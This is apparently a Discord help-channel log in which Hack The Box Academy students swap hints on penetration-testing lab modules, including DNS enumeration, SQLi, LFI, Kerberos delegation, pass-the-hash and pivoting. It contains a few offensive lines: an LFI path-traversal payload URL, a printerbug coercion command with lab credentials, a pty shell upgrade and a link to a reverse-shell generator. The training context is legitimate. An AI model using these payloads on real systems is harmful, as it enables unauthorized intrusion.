@vital adder Sry had to run an errand.Back now. Im on Login Brute Forcing - Service Authentication Brute Forcing. Here is the exact output:[+] `Now making a dictionary...
[+] Sorting list and removing duplicates...
[+] Saving dictionary to william.txt, counting 44504 words.

Hyperspeed Print? (Y/n) : n
[+] Now load your pistolero with william.txt and shoot! Good luck!`

Whoever invented IMCP tunneling with socks was a genious

it looks like a nmap scan but its SSH (according to what I understood)

@acoustic owl I´m still stuck here.
I queried all subdomains from the screenshot. Only Internal allowed zonetransfer. I queried every subdomain from internal, none allowed zonetransfers. I tried querying and bruteforcing every subdomain from the screenshot, only dev returned anything. The Subdomains i found, i all queried and brute forced and hit badrock again. Unless i missed something really obvisous i´m out of ideas again. For an academy module this is frustrating as hell. I give up for today.

Hey Guys I'm in "Attacking Common Services - Hard" after getting F** password, I don't C a way 2 continue ...

No!
Read the #rules

with what?

@languid dawn #modules message

a box?

with hacking someone account

someones*

F, idk if thats legal lol

https://cdn.discordapp.com/attachments/774040263278592041/1141388436394217623/sussy_dumpass.png

I mean, at least he tried xd

If dev gives something back, it is a zone 😉

This section requires a deep understanding of DNS.

I ||understand I'm need 2 create a local linked server||, but I can't manage 2 do so...

Well I am trying to do the SQLi module but when I am following steps who in the module I am getting this problem.

With a blank password.

you are trying to connect to yourself

Yes?

first you are on the right path and the output look good but you don't get a wordlist for some reason?

so are you running a mysql server on your kali?

I should to connect to the target given by the module?

I am trying.

of course

Alr alr.

hint you are on a some what right path but wrong idea

OK i will continue with that hint and more reading up tomorrow. Thanks for the hint. For now my head hurts 😄

Yea, think about what you are reading or saying, and what you are actually seeing. This through me off for a bit of time.

What you like or dislike is absolutely irrelevant in this channel.
Stick to the #rules or feel the 👢 of a mod/Admin

my god U killed me right now....

gobuster vhost --random-agent
or
gobuster vhost --useragent yourstring

https://sohvaxus.github.io/content/gobuster.html

maybe another 1 please?

a better way to put this is you don't need to create anything

wmic command fails

sid fails

^

the cheat sheet does not work for HTB academy

https://dontasktoask.com/

thanks

sorry to offend snowflake

no i'm communist

not sure what 2 do next,
thanx anyway 👍

hint go back to the ||SQL|| section there is some example for this ||(near the end)||

yeah..

still trying 2 figure it out ....

pretty sure if you ask it the right thing it will help you

if you ask that then of course 🤣

just use https://www.revshells.com/

@rustic sage also read #welcome and #rules after that use /verify at #bot-commands and if you have questions that isn't about the academy module pls ask that in either #general or #hacker-lounge or #1024429874246590575 thk

Fixed it by switching to the pwnbox

Module: Winprivesc - Section: DnsAdmins: i'm part of domain adm with netadm but can't read the flag on admin desktop. is this correct?

How have mods not cleaned up this mess still

how do you convert a RID decimal you obtain from a SID and convert it into hex like i this module - https://academy.hackthebox.com/module/143/section/1269

this paragraph:
While looking at users in rpcclient, you may notice a field called rid: beside each user. A Relative Identifier (RID) is a unique identifier (represented in hexadecimal format) utilized by Windows to track and identify objects. To explain how this fits in, let's look at the examples below:

The SID for the INLANEFREIGHT.LOCAL domain is: S-1-5-21-3842939050-3880317879-2865463114.
When an object is created within a domain, the number above (SID) will be combined with a RID to make a unique value used to represent the object.
`So the domain user htb-student with a RID:[0x457] Hex 0x457 would = decimal 1111, will have a full user SID of: S-1-5-21-3842939050-3880317879-2865463114-1111.`
This is unique to the htb-student object in the INLANEFREIGHT.LOCAL domain and you will never see this paired value tied to another object in this domain or any other.

However, there are accounts that you will notice that have the same RID regardless of what host you are on. Accounts like the built-in Administrator for a domain will have a RID [administrator] rid:[0x1f4], which, when converted to a decimal value, equals 500. The built-in Administrator account will always have the RID value Hex 0x1f4, or 500. This will always be the case. Since this value is unique to an object, we can use it to enumerate further information about it from the domain. Let's give it a try again with rpcclient. We will dig a bit targeting the htb-student user.

Module: Pivoting, Tunneling, and Port Forwarding
Chapter: Skills Assessment
Question: Submit the contents of C:\Flag.txt located on the Domain Controller.
Issue: I'm in the machine before the ||(172.16.6.25)|| DC ||(172.16.10.5)|| and as per the hints in here ||I should find a mount drive on it|| but I can't find the ||Z: drive|| as can be seen below

thats a normal decimal to hex conversion, you can just type in google "500 in hex" and it will tell you

Module: Kerberos Attacks
Question: Unconstrained Delegation - Users

callum.dixon:C@lluMDIXON has Unconstrained Delegation set and carole.rose:jasmine has genericwrite over callum.dixon. Using this information, try to compromise the domain and read the content of C:\flag.txt on DC01

I can't seem to get printerbug or krbrelayx.py to work properly, whenever I execute printerbug with

python3 printerbug.py inlanefreight.local/carole.rose:jasmine@10.129.205.35 roguecomputer.inlanefreight.local

I get an error in krbrelayx that the MechType is unsupported any help please

I tried cyberchef and it gave me weird output

cyberchef probably works on the ascii representation of your input and not on the actual number 500

I know the admin one but other users will have other sids. It that the same for 1111, 1112, 1113 etc...

So just google it basically?

you should probably take a quick detour and look up what hexadecimal/binary/decimal means and how the same number gets represented in each numeral system

google can do it, calculators can, you can calculate it manually or use a programming language to go from decimal to hex number representation. Its just a different way of writing the same number

hint use one of the example to get a list of user and there rid (in hex) convert the number in the question into hex and compare that with the list you got

I understand them. Looking for a quick way to convert to enumerate rids using rpcclient if I need to

May I get a hint for this please

I see what you're saying I was speaking in general. If I have a user named sam in my ad set wouldn't it have a different RID than the examples?

since it's immutable?

not sure but i think so

also you can google for a quick Hexadecimal to Decimal converter if you want to do the converting the other way around

See what I mean. If I get a list of SID's, I am trying to find and easy way to grab the RID of the end and convert it to HEX to enumerate them in rpcclient to get a user list to password spray using cme or other tools. If I just Google it I get the needed answer.

THanks all

HTB representing at DefCOn this year 💪

yeah can't wait for the new prolab

Do you guys feel that Server-side attack module needs a rework? I haven't finished it yet, but I feel it's so long, yet I'm barely understanding a thing compared to any other module.

Server-Side attacks was okay, skills assessment barely covered stuff in the module though. The API attacks and Session Security ones definitely need a little bit more improvement

Anyone available for a DM I have a few questions on how to do this attack

anyone can help me out with this?

Windows Event Logs & Finding Evil

Hi, I'm currently doing the Attacking SQL databases and for the life of me I can't connect to the MSSQL port(HTB provided credentials). I used mssqclient.py, sqsh on both my host machine and the Browser Machine and I can't connect to the share. I even copied and pasted the cheatsheet and just changed the IP and creds and I still can't connect. Anyone else having this problem

I am learning SQLi but I would like to know, how do we know we are as admin? We should know an username to be connected as admin right?

root is at /root?

yes

its /root

or wdym?

looks like whatever shell youre using doesnt support changing directories

just use your commands with full paths instead of cd first

you dont have to cd to / and then ls, you can just ls /

that or get a more flexible shell going

dealers choice

Probably upgrade to a pty shell

So do the python pty upgrade

python3 -c 'import pty;pty.spawn("/bin/sh")'

It's a fairly basic command I'm surprised it's not in the section

The getting started: nibbles does go over a reverse shell method

I'd highly recommend though following the module's way first, and then trying to find alternative ways

As the video you watched was probably the actual retired box, and not related to how academy wants to teach it

Just that server:port

It's a docker container with a public ip

Since it's a docker container though high likelihood its a website and you can visit http://ip:port

None of those

You're looking for a vulnerable plugin

:)

And iirc when you visit the page, it's nice enough to tell you

Look it up and find out

Iirc there's only one that regards file reading

for attacking common applications > skills assessment 3, the given RDP creds just don't seem to work. the command i'm using is rdesktop -u Administrator -p xcyj8izxNVzhf4z 10.129.95.200. the RDP connection initiates, but when i get to the rdesktop interface, the login screen greets me with "That username or password is incorrect, try again". i'm not really sure what i'm doing wrong here - the creds are the provided ones, the VPN is up, but it just doesn't accept the creds it's supposed to.

try xfreerdp

that worked, thanks

pog

Hi! Anyone can help me through DM's or from here. I'm stuck doing the File Inclusion Prevention section and I have a question about the second question. To rewrite the php.ini files do you need to do a sudo chown to change the file ownership from the root user to the htb-user. I have tried a lot of things a nothing seems to disable the system function

Or you can do sudo vim/nano/whatever editor

Well I am stuck at the module SQLi, the section "Using Comments", I do not understand why it's telling me it's failed,

I tried ||tom, root, admin, user||.

hello all please give me a hint on this question .... am not able to spawn a reverse shell although i followed the steps in the module
section: password attacks
module: pass the hash
Using Julio's hash, perform a Pass the Hash attack, launch a PowerShell console and import Invoke-TheHash to create a reverse shell to the machine you are connected via RDP (the target machine, DC01, can only connect to MS01). Use the tool nc.exe located in c:\tools to listen for the reverse shell. Once connected to the DC01, read the flag in C:\julio\flag.txt.
appreciate any help

i can't connect to DC01, i just connect to MS01

Nvm found.

anyone? 🥺

I would guess either you're not following the directions precisely or you need to reset the environment.

splunk module

That is indeed the splunk module

yep need help w that question

What have you tried?

i found th eport for one of them

not both tho

I followed what is in the module notes, but I can only connect to MS01

Just looking around should help

It seems to be clearly telling you to connect to MS01 and then to DC01. Did you try that?

It actually gives a clear example of what to do

I say that as I'm struggling with what should be an easy challenge. Broken Authentication - Predictable Reset Token - question 2. I know the encoding and token format. I've tried variations and still can't get it to work. Feels like it should be something simple I'm not doing right.

sprays windex on it

Just to understand how to avoid to have SQLi on a website, we have to block any special character like space, ', (, etc. no?

When we use MySQL, etc.

No. Parameterized or 'bound' sql statements

What?

I did not finish the module but trying to understand x).

Trying to implement a filter is not a good solution

Ah.

They explain at the end?

In the module from HTB.

Something like from the answer here https://stackoverflow.com/questions/13190392/how-can-i-bind-a-list-to-a-parameter-in-a-custom-query-in-sqlalchemy

Hi can someone help me with the docker section for Linux Priv Esc? I am unsure of where to start after you SSH into the target machine

Just follow the section

The command you need to exploit is literally given at the end

Nope

thanks. was able to get root and find the flag 🙂

You’re welcome 👍🏼

Module: Broken Authentication
Section: Predictable Reset Token
Question: ```
Create a token on the web application exposed at subdirectory /question1/ using the Create a reset token for htbuser button. Within an interval of +-1 second a token for the htbadmin user will also be created. The algorithm used to generate both tokens is the same as the one shown when talking about the Apache OpenMeeting bug. Forge a valid token for htbadmin and login by pressing the "Check" button. What is the flag?

Can I get some help with this? I have code thats functioning, but I cant get the solution.

Wait, what?
Your code works, but it doesn't work?

Your code must generate tokens based on the time displayed.
If you look closely at the token from the user, the time is given in Unix Timestamp format. That means in milliseconds
This means that you have to create a token for the given time +/-1000 milliseconds. So in total 2001 tokens.
Your script must then test these against the page.

works in that it generates tokens, send them, and i get responses, but no correct token submissions

If I brute force a random site without permission, will there be any problems?

themIm stuck on the first part of WINDOWS EVENT LOGS & FINDING EVIL, Windows Event Logs
. I tried many things when looking into the logs and backtracking. I feel like there wasnt enough of an explanation on where i should be looking, i tried their links and read through, but nothing helped. Could really use some advise on this

@acoustic owl could you glance at my code and tell me if im way off?

I am not at the PC and have only the cell phone to read the text. But I can try

Any attack without authorization leads to problems

hey guys, I'm stuck in the Password Attacks Lab Hard, any hint regarding
to brute force?

i'm doing the password attack lab

how long did it take anyone who completed this lab to get the usernam and password ?

how many files did you download from the resources?

just the one password file

and ofc i did the mut_password.list file as well

@iron plaza

you sure you tried it with the mutated file?

i haven't done that file yet, just running the regular password.list file first

well try that aswell

eta on how long that will take ?

Anyone can help me ? I also tried the PetitPotam.py exploit but I keep getting “200 OK” followed by HTTP headers and HTML in the body.

it will take a long time throught ssh, do it with the smb, its the same password 🙂

smb doesn't work

do a nmap and look what other services you get, try ftp

Can anyone help me??

i'm stuck with this question a few hours

wow, i got it 🦾

if someone can help me through

who complete LFI module

Bypass basic path traversal filter is not working

how can i bypass that

The above web application employs more than one filter to avoid LFI exploitation. Try to bypass these filters to read /flag.txt

how can i bypass that

I can't understand how all the guys I read have get the "action.php" file with the "id" parameter in SQLMap Essentials - Skill Assessment. I've checked all the minishop webpage, I've used dirb and fuff to find files or directories, but I can´t get it. CAN ANYONE HELP ME WITH THIS PLS?

i read that

and i tried

So you have not seen the action.php show up? Is that the question?

for Linux Priv Esc under Python Library Hijacking section, I am unsure of how to proceed:

Your real close here, look at the section and see where they are starting out with the /

Asking for (newbie) reccomendation, what distro did you guys use rn?

Most people use kali or parrot

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

bro i tried it,s not working

why

Alright, thank you @fathom pendant

Try changing the language on the page and pay close attention to the URL when you do.

i use manjaro

was planning on switching to NixOS but not sure yet

The section goes over what to do here. Look at what the Python file is importing, and see if you can hijack that.

http://83.136.252.24:38732/index.php?language=....//....//....//....//etc/passwd

i tried it

Can I DM you?

sure thing

Seems like that is not it...

i did that

bro

again, look at the URL when you choose a language, you are starting in the wrong place for the LFI. Where is the / ?

add langauages parameter

is there a python course for beginners somewhere?

bro go and read books i think it,s a good source

u got a lot of knowledge that the courses not give you

Module: Attacking Thick Client Applications
The doco explains to right click on the address and select "Dump Memory to File"
This has been asked a couple of times here with no 'non DM' answer can someone please assist, for context this is what im looking at

EDIT: For people that come across the same issue, to find the DUmp to memory to file option you need to go back to the Memory Map tab (After identifying you have MZ in your magic bytes) and right click on the address in that section

EDIT2: If you have having issues with the memory map refreshing too much, saw this asked a couple of times too, sort the information in here by the address column, little harder to track the entry but a million times easier than a bouncing list.

Introduction to Windows Command Line
on the skills assessments,
none of these account names got accepted as a flag
need any hint or clarification if I'm doing something wrong

Don't use a filter

As in don't filter by amount

Because the question is specifically stating "multiple in a row"

I believe the module/section gives an example using a table format which grants a larger picture

u mean the filter hash table ?

I just mean whatever is giving you that count hold on

Read the question carefully, and ask yourself on which machine you are currently on

Also that

shouldn't it be user10 ?

tried all users

have been stuck there for 2 days

Are you logged into the domain controller?

yeah, once I got in the machine I did ssh to to DC

https://www.itprotoday.com/powershell/how-find-failed-logon-attempts-powershell this is what I used

well, ty but it didn't tell more than the event section

So you've done the |Select-Object TimeCreated, Message | Format-Table -Wrap?

yeah

The output that you showed earlier had truncated output

That's why I was confused

You may need to manually parse through some of the info to actually see it

yeah got u, The problem that I don't know what am doing wrong,
and to be honest after 2 days I saw a video for its solution and with the same steps it doesn't show the same output that contain the flag

I think your command is slightly off

That's the thing if you copy/paste the command from the site I linked, it should give it to you

So there's something that you're doing incorrectly

I should look at this part of every message u meant ?

Whether it's not actually being connected to the DC or adding filters that you don't need

Yes

looked at it for so long and the same thing 😦

Once you scroll through it for a bit, you'll find it easily

Because the answer isn't an actual account name on the system, which is throwing you off

I believe

Your filter was filtering just accounts on the system, which wasn't showing the full picture

admin isn't necessarily the wrong thought path however

get-winevent -filterhashtable @{logname='security';id='4625'} | foreach-object{$_.properties[5].value} | group-object | select-object count,name

you can try it, i believe it will give u the answer

You don't need the foreach

Yeah your idea was in the right place but your filter is just not right

to prove that I'm DC xd

Use the command given in the website I linked earlier

will reset the machine and try again

I mean sure

But I'm just telling you what's actually wrong

tried it again and the same output

Your command or the one from the website

the one from the website that show every message

so when I ssh from my machine to user10
then I ssh to user10 again

I think am an idiot here or am doing it right ?

You should be ssh to the dc as user10

ssh user10@<IP>
am doing it with that ^

Yes

And the dc is user7 ip

yeah

oh no

xd

shit

Hey guys, I´m kinda stuck right now on the Knowledge Check of the "Getting started" module, I feel like I´m missing something really stupid, I already tried to run RCE vuln on it, I also tried GetSimpleCMS PHP File Upload Vulnerability but I get Auth failed (I already made sure to check it´s the right username and password), I also tried XSS on theme-edit.php but the upload button doesn´t seem to be working and tried a reverse shell but I don´t get any response

@fathom pendant ty and sry for the headache bro, I think i got crazy xd

You were ssh into the same ip

And not dc

yeah

Which is what we were trying to tell you xD

the problem that I didn't notice it because in the previous questions starting from user7 I was doing it right

suddenly it went away from my mind

Gl in future!

Hello everyone, does any of you had segfault when starting the msfvenom payload on ubuntu box ?

I get the same issue as this guy

Is it because i created the payload on a arm machine for a x64 one ?

what it the output of the arch command ?

if you are on arm system it's still shouldn't matter (i think) but if the normal elf shell doesn't work try metasploit web delivery

Oh i know what it was !!

Forgot to set the correct payload in msfconsole

is it possible to give where im at and what im thinking for whitebox attacks skills assessment to see if im in the ball park?

Anyone know why I'm unable to rdp onto windows box in the ad enum and attack module using xfreerdp /u:htb-student /p:'Academy_student_AD!' /v:ip

in general you need to give the AD box's a good few min to fully booted up before you can even used it

also if you are having timeout issue you can use /timeout:80000

If I tried to rdp in while it's setting up could that break the box?

can't say for sure but personality i do feel like some of the AD box's does get a bit more buggy if you touch it before it's fully booted up but that could just be a me thing

Okay thanks I'll revert and wait 5 mins before I rdp in

Still not working. I've noticed in the past I have had to click accept or continue on a blue screen before the desktop loads, is there a command to auto accept this?

Currently the rdp window opens but is just a black screen

which section are you on? i'll get that i try

Kerberoasting with windows

When I add the timeout flag it worked immediately?

Brings up a computer access policy screen

That's weird I thought the log would have said something about the timeout

Ty

can anyone help with whitebox attacks skills assessment?

@wanton estuary thought i might as well send you the screenshot i make for this

Cheers

I did it, but wasted half a day because of the wrong wordlist 😦
Thanks for you time and patience 🙂 Mind if i add you?

Sure, dm me.

Do I really have to scan for 4 hours? (Pivoting, Tunneling, and Port Forwarding - Skill assessment)

Nmap through proxychains sucks

welp f

Try a different method of ping sweep

aaaaa

Hint: check the ip of the target you're connected to. That's where you can start

Can anyone give me an example? I cannot get the DNS working in ATTACKING COMMON SERVICES - Attacking DNS.

Found it, thanks

Are you adding the ip to your command?

yes and no, tried with and without (you gave me earlier this hint) but i didnt get what i was expecting. Can you give me an example? So i can see what i am doing wrong.